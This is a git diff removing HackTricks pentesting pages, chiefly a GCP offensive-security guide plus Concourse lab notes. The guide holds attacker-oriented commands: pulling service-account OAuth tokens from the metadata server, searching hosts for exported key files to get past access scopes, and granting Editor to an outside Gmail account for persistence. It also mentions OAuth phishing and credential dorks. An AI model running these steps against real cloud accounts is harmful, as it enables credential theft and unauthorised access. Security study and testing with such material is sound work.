-However, the web server is checking every few seconds the containers that are running, and if an unexpected one is discovered, it will be deleted. As the communication occurs over HTTP, you could tamper with the communication to avoid the deletion of unexpected containers:
-
-```
-GET /containers HTTP/1.1.
-Host: 127.0.0.1:7777.
-User-Agent: Go-http-client/1.1.
-Accept-Encoding: gzip.
-.
-
-T 127.0.0.1:7777 -> 127.0.0.1:59722 [AP] #157
-HTTP/1.1 200 OK.
-Content-Type: application/json.
-Date: Thu, 17 Mar 2022 22:42:55 GMT.
-Content-Length: 131.
-.
-{"Handles":["123ae8fc-47ed-4eab-6b2e-123458880690","ac793559-7f53-4efc-6591-0171a0391e53","c6cae8fc-47ed-4eab-6b2e-f3bbe8880690"]}
-
-T 127.0.0.1:59722 -> 127.0.0.1:7777 [AP] #159
-DELETE /containers/123ae8fc-47ed-4eab-6b2e-123458880690 HTTP/1.1.
-Host: 127.0.0.1:7777.
-User-Agent: Go-http-client/1.1.
-Accept-Encoding: gzip.
-```
-
-
-
-Support HackTricks and get benefits!
-
-- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
-
-- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-
-- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-
-- **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
-
-- **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
-
-
diff --git a/cloud-security/concourse/concourse-lab-creation.md b/cloud-security/concourse/concourse-lab-creation.md
deleted file mode 100644
index 457d4850a..000000000
--- a/cloud-security/concourse/concourse-lab-creation.md
+++ /dev/null
@@ -1,183 +0,0 @@
-
-
-
-
-Support HackTricks and get benefits!
-
-- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
-
-- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-
-- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-
-- **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
-
-- **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
-
-
-
-
-# Testing Environment
-
-## Running Concourse
-
-### With Docker-Compose
-
-This docker-compose file simplifies the installation to do some tests with concourse:
-
-```bash
-wget https://raw.githubusercontent.com/starkandwayne/concourse-tutorial/master/docker-compose.yml
-docker-compose up -d
-```
-
-You can download the `fly` command line tool for your OS from the web interface at `127.0.0.1:8080`.
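-
-For example, from a shell (a sketch; the CLI endpoint serves per-platform binaries):
-
-```bash
-curl -Lo fly 'http://127.0.0.1:8080/api/v1/cli?arch=amd64&platform=linux'
-chmod +x fly && sudo mv fly /usr/local/bin/
-```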
-
-### With Kubernetes (Recommended)
-
-You can easily deploy concourse in **Kubernetes** (in **minikube** for example) using the helm-chart: [**concourse-chart**](https://github.com/concourse/concourse-chart).
-
-```bash
-brew install helm
-helm repo add concourse https://concourse-charts.storage.googleapis.com/
-helm install concourse-release concourse/concourse
-# concourse-release will be the prefix name for the concourse elements in k8s
-# After the installation you will find the indications to connect to it in the console
-
-# If you need to delete it
-helm delete concourse-release
-```
-
-After generating the concourse env, you could create a secret and give the SA running in concourse web access to read K8s secrets:
-
-```yaml
-echo 'apiVersion: rbac.authorization.k8s.io/v1
-kind: ClusterRole
-metadata:
- name: read-secrets
-rules:
-- apiGroups: [""]
- resources: ["secrets"]
- verbs: ["get"]
-
----
-
-apiVersion: rbac.authorization.k8s.io/v1
-kind: RoleBinding
-metadata:
- name: read-secrets-concourse
-roleRef:
- apiGroup: rbac.authorization.k8s.io
- kind: ClusterRole
- name: read-secrets
-subjects:
-- kind: ServiceAccount
- name: concourse-release-web
- namespace: default
-
----
-
-apiVersion: v1
-kind: Secret
-metadata:
- name: super
- namespace: concourse-release-main
-type: Opaque
-data:
- secret: MWYyZDFlMmU2N2Rm
-
-' | kubectl apply -f -
-```
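-
-You can then check that the binding works as intended (a sketch, assuming the names used above):
-
-```bash
-# Should print "yes" if the web SA can now read secrets in the target namespace
-kubectl auth can-i get secrets \
-  --as=system:serviceaccount:default:concourse-release-web \
-  -n concourse-release-main
-```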
-
-## Create Pipeline
-
-A pipeline is made of a list of [Jobs](https://concourse-ci.org/jobs.html) which contains an ordered list of [Steps](https://concourse-ci.org/steps.html).
-
-## Steps
-
-Several different type of steps can be used:
-
-* **the** [**`task` step**](https://concourse-ci.org/task-step.html) **runs a** [**task**](https://concourse-ci.org/tasks.html)
-* the [`get` step](https://concourse-ci.org/get-step.html) fetches a [resource](https://concourse-ci.org/resources.html)
-* the [`put` step](https://concourse-ci.org/put-step.html) updates a [resource](https://concourse-ci.org/resources.html)
-* the [`set_pipeline` step](https://concourse-ci.org/set-pipeline-step.html) configures a [pipeline](https://concourse-ci.org/pipelines.html)
-* the [`load_var` step](https://concourse-ci.org/load-var-step.html) loads a value into a [local var](https://concourse-ci.org/vars.html#local-vars)
-* the [`in_parallel` step](https://concourse-ci.org/in-parallel-step.html) runs steps in parallel
-* the [`do` step](https://concourse-ci.org/do-step.html) runs steps in sequence
-* the [`across` step modifier](https://concourse-ci.org/across-step.html#schema.across) runs a step multiple times; once for each combination of variable values
-* the [`try` step](https://concourse-ci.org/try-step.html) attempts to run a step and succeeds even if the step fails
-
-Each [step](https://concourse-ci.org/steps.html) in a [job plan](https://concourse-ci.org/jobs.html#schema.job.plan) runs in its **own container**. You can run anything you want inside the container _(i.e. run my tests, run this bash script, build this image, etc.)_. So if you have a job with five steps Concourse will create five containers, one for each step.
-
-Therefore, it's possible to indicate the type of container each step needs to be run in.
-
-## Simple Pipeline Example
-
-```yaml
-jobs:
-- name: simple
- plan:
- - task: simple-task
- privileged: true
- config:
- # Tells Concourse which type of worker this task should run on
- platform: linux
- image_resource:
- type: registry-image
- source:
- repository: busybox # images are pulled from docker hub by default
- run:
- path: sh
- args:
- - -cx
- - |
- sleep 1000
- echo "$SUPER_SECRET"
- params:
- SUPER_SECRET: ((super.secret))
-```
-
-```bash
-fly -t tutorial set-pipeline -p pipe-name -c hello-world.yml
-# pipelines are paused when first created
-fly -t tutorial unpause-pipeline -p pipe-name
-# trigger the job and watch it run to completion
-fly -t tutorial trigger-job --job pipe-name/simple --watch
-# From another console
-fly -t tutorial intercept --job pipe-name/simple
-```
-
-Check **127.0.0.1:8080** to see the pipeline flow.
-
-## Bash script with output/input pipeline
-
-It's possible to **save the results of one task in a file** and declare it as an output, and then declare the input of the next task as the output of the previous task (see the sketch below). What concourse does is to **mount the directory of the previous task in the new task, where you can access the files created by the previous task**.
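-
-A minimal sketch of that input/output wiring between two tasks of the same job (names and commands are illustrative):
-
-```yaml
-jobs:
-- name: in-out
-  plan:
-  - task: produce
-    config:
-      platform: linux
-      image_resource: {type: registry-image, source: {repository: busybox}}
-      outputs: [{name: shared}] # directory exposed to later steps
-      run: {path: sh, args: ["-c", "echo hello > shared/msg.txt"]}
-  - task: consume
-    config:
-      platform: linux
-      image_resource: {type: registry-image, source: {repository: busybox}}
-      inputs: [{name: shared}] # mounted with the content the previous task wrote
-      run: {path: cat, args: ["shared/msg.txt"]}
-```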
-
-## Triggers
-
-You don't need to trigger the jobs manually every time you need to run them; you can also program them to run automatically:
-
-* Some time passes: [Time resource](https://github.com/concourse/time-resource/)
-* On new commits to the main branch: [Git resource](https://github.com/concourse/git-resource)
-* New PRs: [Github-PR resource](https://github.com/telia-oss/github-pr-resource)
-* Fetch or push the latest image of your app: [Registry-image resource](https://github.com/concourse/registry-image-resource/)
-
-Check a YAML pipeline example that triggers on new commits to master in [https://concourse-ci.org/tutorial-resources.html](https://concourse-ci.org/tutorial-resources.html)
-
diff --git a/cloud-security/gcp-security/README.md b/cloud-security/gcp-security/README.md
deleted file mode 100644
index c93ac8df7..000000000
--- a/cloud-security/gcp-security/README.md
+++ /dev/null
@@ -1,540 +0,0 @@
-# GCP Security
-
-## Security concepts
-
-### **Resource hierarchy**
-
-Google Cloud uses a [Resource hierarchy](https://cloud.google.com/resource-manager/docs/cloud-platform-resource-hierarchy) that is similar, conceptually, to that of a traditional filesystem. This provides a logical parent/child workflow with specific attachment points for policies and permissions.
-
-At a high level, it looks like this:
-
-```
-Organization
---> Folders
- --> Projects
- --> Resources
-```
-
-A virtual machine (called a Compute Instance) is a resource. A resource resides in a project, probably alongside other Compute Instances, storage buckets, etc.
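-
-For instance, you can walk the hierarchy top-down with `gcloud` (a sketch; the IDs are placeholders and each command requires the corresponding read permission):
-
-```bash
-# Organizations visible to you
-gcloud organizations list
-# Folders under an organization
-gcloud resource-manager folders list --organization [ORG_ID]
-# Projects visible to you
-gcloud projects list
-```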
-
-### **IAM Roles**
-
-There are **three types** of roles in IAM:
-
-* **Basic/Primitive roles**, which include the **Owner**, **Editor**, and **Viewer** roles that existed prior to the introduction of IAM.
-* **Predefined roles**, which provide granular access for a specific service and are managed by Google Cloud. There are a lot of predefined roles, you can **see all of them with the privileges they have** [**here**](https://cloud.google.com/iam/docs/understanding-roles#predefined\_roles).
-* **Custom roles**, which provide granular access according to a user-specified list of permissions.
-
-There are thousands of permissions in GCP. In order to check if a role has a specific permission you can [**search the permission here**](https://cloud.google.com/iam/docs/permissions-reference) and see which roles have it.
-
-**You can also** [**search here predefined roles**](https://cloud.google.com/iam/docs/understanding-roles#product\_specific\_documentation) **offered by each product.**
-
-**You can find a** [**list of all the granular permissions here**](https://cloud.google.com/iam/docs/custom-roles-permissions-support)**.**
-
-#### Basic roles
-
-| Name             | Title  | Permissions                                                                                                                                         |
-| ---------------- | ------ | --------------------------------------------------------------------------------------------------------------------------------------------------- |
-| **roles/viewer** | Viewer | Permissions for **read-only actions** that do not affect state, such as viewing (but not modifying) existing resources or data.                      |
-| **roles/editor** | Editor | All **viewer permissions**, **plus** permissions for actions that modify state, such as changing existing resources.                                 |
-| **roles/owner**  | Owner  | All **Editor** permissions, **plus** permissions to manage roles and permissions for a project and all resources within it, and to set up billing.   |
-
-You can try the following command to specifically **enumerate roles assigned to your service account** project-wide in the current project:
-
-```bash
-PROJECT=$(curl http://metadata.google.internal/computeMetadata/v1/project/project-id \
- -H "Metadata-Flavor: Google" -s)
-ACCOUNT=$(curl http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/email \
- -H "Metadata-Flavor: Google" -s)
-gcloud projects get-iam-policy $PROJECT \
- --flatten="bindings[].members" \
- --format='table(bindings.role)' \
- --filter="bindings.members:$ACCOUNT"
-```
-
-Don't worry too much if you get denied access to the command above. It's still possible to work out what you can do simply by trying to do it.
-
-More generally, you can shorten the command to the following to get an idea of the **roles assigned project-wide to all members**.
-
-```
-gcloud projects get-iam-policy [PROJECT-ID]
-```
-
-Or to see the IAM policy [assigned to a single Compute Instance](https://cloud.google.com/sdk/gcloud/reference/compute/instances/get-iam-policy) you can try the following.
-
-```
-gcloud compute instances get-iam-policy [INSTANCE] --zone [ZONE]
-```
-
-### **Organization Policies**
-
-IAM policies indicate the permissions principals have over resources via roles, which are assigned granular permissions. Organization policies **restrict how those services can be used and which features are enabled or disabled**. This helps improve least privilege for each resource in the GCP environment.
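-
-To review which constraints are actually enforced, something like the following should work (a sketch; the constraint name is just an example):
-
-```bash
-# List organization policies applied at the project level
-gcloud resource-manager org-policies list --project [PROJECT_ID]
-# Inspect one specific constraint
-gcloud resource-manager org-policies describe compute.disableSerialPortAccess --project [PROJECT_ID]
-```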
-
-### **Terraform IAM Policies, Bindings and Memberships**
-
-As defined by Terraform in [https://registry.terraform.io/providers/hashicorp/google/latest/docs/resources/google\_project\_iam](https://registry.terraform.io/providers/hashicorp/google/latest/docs/resources/google\_project\_iam), when using Terraform with GCP there are different ways to grant a principal access over a resource:
-
-* **Memberships**: You set **principals as members of roles** **without restrictions** over the role or the principals. You can put a user as a member of a role, then put a group as a member of the same role, and also set those principals (user and group) as members of other roles.
-* **Bindings**: Several **principals can be bound to a role**. Those **principals can still be bound to or be members of other roles**. However, if a principal which isn't bound to the role is set as a **member of a bound role**, the next time the **binding is applied, the membership will disappear**.
-* **Policies**: A policy is **authoritative**: it indicates roles and principals and then **those principals cannot have more roles and those roles cannot have more principals** unless that policy is modified (not even via other policies, bindings or memberships). Therefore, when a role or principal is specified in a policy, all its privileges are **limited by that policy**. Obviously, this can be bypassed if the principal is given the option to modify the policy or privilege escalation permissions (like creating a new principal and binding a new role to them).
-
-### **Service accounts**
-
-Virtual machine instances are usually **assigned a service account**. Every GCP project has a [default service account](https://cloud.google.com/compute/docs/access/service-accounts#default\_service\_account), and this will be assigned to new Compute Instances unless otherwise specified. Administrators can choose to use either a custom account or no account at all. This service account **can be used by any user or application on the machine** to communicate with the Google APIs. You can run the following command to see what accounts are available to you:
-
-```
-gcloud auth list
-```
-
-**Default service accounts will look like** one of the following:
-
-```
-PROJECT_NUMBER-compute@developer.gserviceaccount.com
-PROJECT_ID@appspot.gserviceaccount.com
-```
-
-A **custom service account** will look like this:
-
-```
-SERVICE_ACCOUNT_NAME@PROJECT_NAME.iam.gserviceaccount.com
-```
-
-If `gcloud auth list` returns **multiple** accounts **available**, something interesting is going on. You should generally see only the service account. If there is more than one, you can cycle through each using `gcloud config set account [ACCOUNT]` while trying the various tasks in this page.
-
-### **Access scopes**
-
-The **service account** on a GCP Compute Instance will **use** **OAuth** to communicate with the Google Cloud APIs. When [access scopes](https://cloud.google.com/compute/docs/access/service-accounts#accesscopesiam) are used, the OAuth token that is generated for the instance will **have a** [**scope**](https://oauth.net/2/scope/) **limitation included**. This defines **what API endpoints it can authenticate to**. It does **NOT define the actual permissions**.
-
-When using a **custom service account**, Google [recommends](https://cloud.google.com/compute/docs/access/service-accounts#service\_account\_permissions) that access scopes are not used and to **rely totally on IAM**. The web management portal actually enforces this, but access scopes can still be applied to instances using custom service accounts programmatically.
-
-There are three options when setting an access scope on a VM instance:
-
-* Allow default access
-* Allow full access to all Cloud APIs
-* Set access for each API
-
-You can see what **scopes** are **assigned** by **querying** the **metadata** URL. Here is an example from a VM with "default" access assigned:
-
-```
-$ curl http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/scopes \
- -H 'Metadata-Flavor:Google'
-
-https://www.googleapis.com/auth/devstorage.read_only
-https://www.googleapis.com/auth/logging.write
-https://www.googleapis.com/auth/monitoring.write
-https://www.googleapis.com/auth/servicecontrol
-https://www.googleapis.com/auth/service.management.readonly
-https://www.googleapis.com/auth/trace.append
-```
-
-The most interesting thing in the **default** **scope** is **`devstorage.read_only`**. This grants read access to all storage buckets in the project. This can be devastating, which of course is great for us as an attacker.
-
-Here is what you'll see from an instance with **no scope limitations**:
-
-```
-curl http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/scopes -H 'Metadata-Flavor:Google'
-https://www.googleapis.com/auth/cloud-platform
-```
-
-This `cloud-platform` scope is what we are really hoping for, as it will allow us to authenticate to any API function and leverage the full power of our assigned IAM permissions.
-
-It is possible to encounter some **conflicts** when using both **IAM and access scopes**. For example, your service account may have the IAM role of `compute.instanceAdmin` but the instance you've breached has been crippled with the scope limitation of `https://www.googleapis.com/auth/compute.readonly`. This would prevent you from making any changes using the OAuth token that's automatically assigned to your instance.
-
-### Default credentials
-
-**Default service account token**
-
-The **metadata server** available to a given instance will **provide** any user/process **on that instance** with an **OAuth token** that is automatically used as the **default credentials** when communicating with Google APIs via the `gcloud` command.
-
-You can retrieve and inspect the token with the following curl command:
-
-```bash
-curl "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token" \
- -H "Metadata-Flavor: Google"
-```
-
-This will return a response like the following:
-
-```json
-{
-  "access_token":"ya29.AHES6ZRN3-HlhAPya30GnW_bHSb_QtAS08i85nHq39HE3C2LTrCARA",
-  "expires_in":3599,
-  "token_type":"Bearer"
-}
-```
-
-This token is the **combination of the service account and access scopes** assigned to the Compute Instance. So, even though your service account may have **every IAM privilege** imaginable, this particular OAuth token **might be limited** in the APIs it can communicate with due to **access scopes**.
-
-**Application default credentials**
-
-When using one of Google's official GCP client libraries, the code will automatically go **searching for credentials** following a strategy called [Application Default Credentials](https://cloud.google.com/docs/authentication/production).
-
-1. First, it will check the [**source code itself**](https://cloud.google.com/docs/authentication/production#passing\_the\_path\_to\_the\_service\_account\_key\_in\_code). Developers can choose to statically point to a service account key file.
-2. The next is an **environment variable called `GOOGLE_APPLICATION_CREDENTIALS`**. This can be set to point to a **service account key file**.
-3. Finally, if neither of these are provided, the application will revert to using the **default token provided by the metadata server** as described in the section above.
-
-Finding the actual **JSON file with the service account credentials** is generally much **more** **desirable** than **relying on the OAuth token** on the metadata server. This is because the raw service account credentials can be activated **without the burden of access scopes** and without the short expiration period usually applied to the tokens.
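-
-For example, the second ADC option looks roughly like this (a sketch; the key path is hypothetical):
-
-```bash
-# Point Application Default Credentials at an exported key file
-export GOOGLE_APPLICATION_CREDENTIALS=/path/to/exported-key.json
-# gcloud can mint an ADC access token honouring that variable
-gcloud auth application-default print-access-token
-```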
-
-### **Networking**
-
-Compute Instances are connected to networks called VPCs or [Virtual Private Clouds](https://cloud.google.com/vpc/docs/vpc). [GCP firewall](https://cloud.google.com/vpc/docs/firewalls) rules are defined at this network level but are applied individually to a Compute Instance. Every network, by default, has two [implied firewall rules](https://cloud.google.com/vpc/docs/firewalls#default\_firewall\_rules): allow outbound and deny inbound.
-
-Each GCP project is provided with a VPC called `default`, which applies the following rules to all instances (you can verify them with the commands shown after this list):
-
-* default-allow-internal (allow all traffic from other instances on the `default` network)
-* default-allow-ssh (allow 22 from everywhere)
-* default-allow-rdp (allow 3389 from everywhere)
-* default-allow-icmp (allow ping from everywhere)
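-
-A quick sketch to enumerate the rules actually present:
-
-```bash
-# List all firewall rules in the current project
-gcloud compute firewall-rules list
-# Full detail of a single rule (the name is an example)
-gcloud compute firewall-rules describe default-allow-ssh
-```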
-
-**Meet the neighbors**
-
-Firewall rules may be more permissive for internal IP addresses. This is especially true for the default VPC, which permits all traffic between Compute Instances.
-
-You can get a nice readable view of all the subnets in the current project with the following command:
-
-```
-gcloud compute networks subnets list
-```
-
-And an overview of all the internal/external IP addresses of the Compute Instances using the following:
-
-```
-gcloud compute instances list
-```
-
-If you go crazy with nmap from a Compute Instance, Google will notice and will likely send an alert email to the project owner. This is more likely to happen if you are scanning public IP addresses outside of your current project. Tread carefully.
-
-**Enumerating public ports**
-
-Perhaps you've been unable to leverage your current access to move through the project internally, but you DO have read access to the compute API. It's worth enumerating all the instances with firewall ports open to the world - you might find an insecure application to breach and hope you land in a more powerful position.
-
-In the section above, you've gathered a list of all the public IP addresses. You could run nmap against them all, but this may take ages and could get your source IP blocked.
-
-When attacking from the internet, the default rules don't provide any quick wins on properly configured machines. It's worth checking for password authentication on SSH and weak passwords on RDP, of course, but that's a given.
-
-What we are really interested in is other firewall rules that have been intentionally applied to an instance. If we're lucky, we'll stumble over an insecure application, an admin interface with a default password, or anything else we can exploit.
-
-[Firewall rules](https://cloud.google.com/vpc/docs/firewalls) can be applied to instances via the following methods:
-
-* [Network tags](https://cloud.google.com/vpc/docs/add-remove-network-tags)
-* [Service accounts](https://cloud.google.com/vpc/docs/firewalls#serviceaccounts)
-* All instances within a VPC
-
-Unfortunately, there isn't a simple `gcloud` command to spit out all Compute Instances with open ports on the internet. You have to connect the dots between firewall rules, network tags, service accounts, and instances.
-
-We've automated this completely using [this python script](https://gitlab.com/gitlab-com/gl-security/gl-redteam/gcp\_firewall\_enum) which will export the following:
-
-* CSV file showing instance, public IP, allowed TCP, allowed UDP
-* nmap scan to target all instances on ports ingress allowed from the public internet (0.0.0.0/0)
-* masscan to target the full TCP range of those instances that allow ALL TCP ports from the public internet (0.0.0.0/0)
-
-## Enumeration
-
-### Automatic Tools
-
-* [**https://github.com/carlospolop/purplepanda**](https://github.com/carlospolop/purplepanda): Python script to enumerate resources and find privesc paths
-* [https://gitlab.com/gitlab-com/gl-security/security-operations/gl-redteam/gcp\_enum](https://gitlab.com/gitlab-com/gl-security/security-operations/gl-redteam/gcp\_enum): Bash script to enumerate a GCP environment using the gcloud CLI, saving the results to files
-* [https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation](https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation): Scripts to enumerate high IAM privileges and to escalate privileges in GCP by abusing them (I couldn't get the enumeration script to run)
-* [https://github.com/lyft/cartography](https://github.com/lyft/cartography): Tool to enumerate and display in a graph resources and relations of different cloud platforms
-* [https://github.com/RyanJarv/awesome-cloud-sec](https://github.com/RyanJarv/awesome-cloud-sec): A list of cloud security tools
-
-### IAM
-
-| Description | Command |
-| ---------------------------------------------------------------------------------------------------------------------------------- | ------------------------------------------------------------------------------------------------ |
-| List **roles** | `gcloud iam roles list --filter='etag:AA=='` |
-| Get **description** and permissions of a role | `gcloud iam roles describe roles/container.admin` |
-| Get iam **policy** of a **organisation** | `gcloud organizations get-iam-policy` |
-| Get iam **policy** of a **project** | `gcloud projects get-iam-policy ` |
-| Get iam **policy** of a **folder** | `gcloud resource-manager folders get-iam-policy` |
-| Get **members** of a **group** | `gcloud identity groups memberships search-transitive-memberships --group-email=email@group.com` |
-| Get **permissions** of a **role** | `gcloud iam roles describe roles/accessapproval.approver` |
-| [**Testable permissions**](https://cloud.google.com/iam/docs/reference/rest/v1/permissions/queryTestablePermissions) on a resource | `gcloud iam list-testable-permissions --filter "NOT apiDisabled: true"` |
-| List of **grantable** **roles** for a resource | `gcloud iam list-grantable-roles ` |
-| List **custom** **roles** on a project | `gcloud iam roles list --project $PROJECT_ID` |
-| List **service accounts** | `gcloud iam service-accounts list` |
-
-## Unauthenticated Attacks
-
-{% content-ref url="gcp-buckets-brute-force-and-privilege-escalation.md" %}
-[gcp-buckets-brute-force-and-privilege-escalation.md](gcp-buckets-brute-force-and-privilege-escalation.md)
-{% endcontent-ref %}
-
-#### Phishing
-
-You could **OAuth phish** a user with high privileges.
-
-#### Dorks
-
-* **Github**: auth\_provider\_x509\_cert\_url extension:json
-
-## Generic GCP Security Checklists
-
-* [Google Cloud Computing Platform CIS Benchmark](https://www.cisecurity.org/cis-benchmarks/)
-* [https://github.com/doitintl/secure-gcp-reference](https://github.com/doitintl/secure-gcp-reference)
-
-## Local Privilege Escalation / SSH Pivoting
-
-Supposing that you have compromised a VM in GCP, there are some **GCP privileges** that can allow you to **escalate privileges locally, into other machines and also pivot to other VMs**:
-
-{% content-ref url="gcp-local-privilege-escalation-ssh-pivoting.md" %}
-[gcp-local-privilege-escalation-ssh-pivoting.md](gcp-local-privilege-escalation-ssh-pivoting.md)
-{% endcontent-ref %}
-
-If you have found some [**SSRF vulnerability in a GCP environment check this page**](../../pentesting-web/ssrf-server-side-request-forgery/#6440).
-
-## GCP Post Exploitation
-
-### GCP Interesting Permissions
-
-Once you have obtained some cloud credentials or have compromised some service running inside a cloud, the most common next step is to **abuse misconfigured privileges** the compromised account may have. So, the first thing you should do is to enumerate your privileges.
-
-Moreover, during this enumeration, remember that **permissions can be set at the highest level of "Organization"** as well.
-
-{% content-ref url="gcp-interesting-permissions/" %}
-[gcp-interesting-permissions](gcp-interesting-permissions/)
-{% endcontent-ref %}
-
-### Bypassing access scopes
-
-When [access scopes](https://cloud.google.com/compute/docs/access/service-accounts#accesscopesiam) are used, the OAuth token that is generated for the computing instance (VM) will **have a** [**scope**](https://oauth.net/2/scope/) **limitation included**. However, you might be able to **bypass** this limitation and exploit the permissions the compromised account has.
-
-The **best way to bypass** this restriction is either to **find new credentials** in the compromised host, to **find a service account key to generate an OAuth token** without restrictions, or to **jump to a different, less restricted VM**.
-
-**Pop another box**
-
-It's possible that another box in the environment exists with less restrictive access scopes. If you can view the output of `gcloud compute instances list --quiet --format=json`, look for instances with either the specific scope you want or the **`auth/cloud-platform`** all-inclusive scope.
-
-Also keep an eye out for instances that have the default service account assigned (`PROJECT_NUMBER-compute@developer.gserviceaccount.com`).
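-
-A rough sketch of filtering for such instances (assumes `jq` is available on the host):
-
-```bash
-# Print the names of instances whose service account scopes include cloud-platform
-gcloud compute instances list --quiet --format=json \
-  | jq -r '.[] | select([.serviceAccounts[]?.scopes[]?] | any(contains("cloud-platform"))) | .name'
-```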
-
-**Find service account keys**
-
-Google states very clearly [**"Access scopes are not a security mechanism⦠they have no effect when making requests not authenticated through OAuth"**](https://cloud.google.com/compute/docs/access/service-accounts#accesscopesiam).
-
-Therefore, if you **find a** [**service account key**](https://cloud.google.com/iam/docs/creating-managing-service-account-keys) stored on the instance you can bypass the limitation. These are **RSA private keys** that can be used to authenticate to the Google Cloud API and **request a new OAuth token with no scope limitations**.
-
-Check if any service account has exported a key at some point with:
-
-```bash
-for i in $(gcloud iam service-accounts list --format="table[no-heading](email)"); do
- echo Looking for keys for $i:
- gcloud iam service-accounts keys list --iam-account $i
-done
-```
-
-These files are **not stored on a Compute Instance by default**, so you'd have to be lucky to encounter them. The default name for the file is `[project-id]-[portion-of-key-id].json`. So, if your project name is `test-project` then you can **search the filesystem for `test-project*.json`** looking for this key file.
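-
-For example (a sketch; adjust the pattern to the actual project name):
-
-```bash
-# Search the whole filesystem for what looks like an exported key
-find / -name "test-project*.json" 2>/dev/null
-```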
-
-The contents of the file look something like this:
-
-```json
-{
-"type": "service_account",
-"project_id": "[PROJECT-ID]",
-"private_key_id": "[KEY-ID]",
-"private_key": "-----BEGIN PRIVATE KEY-----\n[PRIVATE-KEY]\n-----END PRIVATE KEY-----\n",
-"client_email": "[SERVICE-ACCOUNT-EMAIL]",
-"client_id": "[CLIENT-ID]",
-"auth_uri": "https://accounts.google.com/o/oauth2/auth",
-"token_uri": "https://accounts.google.com/o/oauth2/token",
-"auth_provider_x509_cert_url": "https://www.googleapis.com/oauth2/v1/certs",
-"client_x509_cert_url": "https://www.googleapis.com/robot/v1/metadata/x509/[SERVICE-ACCOUNT-EMAIL]"
-}
-```
-
-Or, if **generated from the CLI** they will look like this:
-
-```json
-{
-"name": "projects/[PROJECT-ID]/serviceAccounts/[SERVICE-ACCOUNT-EMAIL]/keys/[KEY-ID]",
-"privateKeyType": "TYPE_GOOGLE_CREDENTIALS_FILE",
-"privateKeyData": "[PRIVATE-KEY]",
-"validAfterTime": "[DATE]",
-"validBeforeTime": "[DATE]",
-"keyAlgorithm": "KEY_ALG_RSA_2048"
-}
-```
-
-If you do find one of these files, you can tell the **`gcloud` command to re-authenticate** with this service account. You can do this on the instance, or on any machine that has the tools installed.
-
-```bash
-gcloud auth activate-service-account --key-file [FILE]
-```
-
-You can now **test your new OAuth token** as follows:
-
-```bash
-TOKEN=`gcloud auth print-access-token`
-curl https://www.googleapis.com/oauth2/v1/tokeninfo?access_token=$TOKEN
-```
-
-You should see `https://www.googleapis.com/auth/cloud-platform` listed in the scopes, which means you are **not limited by any instance-level access scopes**. You now have full power to use all of your assigned IAM permissions.
-
-### Service account impersonation
-
-Impersonating a service account can be very useful to **obtain new and better privileges**.
-
-There are three ways in which you can [impersonate another service account](https://cloud.google.com/iam/docs/understanding-service-accounts#impersonating\_a\_service\_account):
-
-* Authentication **using RSA private keys** (covered [above](./#bypassing-access-scopes))
-* Authorization **using Cloud IAM policies** (e.g. being granted `roles/iam.serviceAccountTokenCreator` over the service account; see the sketch after this list)
-* **Deploying jobs on GCP services** (more applicable to the compromise of a user account)
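-
-If your principal has been granted impersonation rights via IAM, `gcloud` can mint tokens directly (a sketch; the service account email is a placeholder):
-
-```bash
-# Get an access token as the target service account
-gcloud auth print-access-token \
-    --impersonate-service-account=target-sa@victim-project.iam.gserviceaccount.com
-```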
-
-### Granting access to management console
-
-Access to the [GCP management console](https://console.cloud.google.com) is **provided to user accounts, not service accounts**. To log in to the web interface, you can **grant access to a Google account** that you control. This can be a generic "**@gmail.com**" account, it does **not have to be a member of the target organization**.
-
-To **grant** the primitive role of **Owner** to a generic "@gmail.com" account, though, you'll need to **use the web console**. `gcloud` will error out if you try to grant it a permission above Editor.
-
-You can use the following command to **grant a user the primitive role of Editor** to your existing project:
-
-```bash
-gcloud projects add-iam-policy-binding [PROJECT] --member user:[EMAIL] --role roles/editor
-```
-
-If you succeeded here, try **accessing the web interface** and exploring from there.
-
-This is the **highest level you can assign using the gcloud tool**.
-
-### Spreading to Workspace via domain-wide delegation of authority
-
-[**Workspace**](https://gsuite.google.com) is Google's c**ollaboration and productivity platform** which consists of things like Gmail, Google Calendar, Google Drive, Google Docs, etc.
-
-**Service accounts** in GCP can be granted the **rights to programmatically access user data** in Workspace by impersonating legitimate users. This is known as [domain-wide delegation](https://developers.google.com/admin-sdk/reports/v1/guides/delegation). This includes actions like **reading email** in Gmail, accessing Google Docs, and even creating new user accounts in the G Suite organization.
-
-Workspace has [its own API](https://developers.google.com/gsuite/aspects/apis), completely separate from GCP. Permissions are granted to Workspace and **there isn't any default relation between GCP and Workspace**.
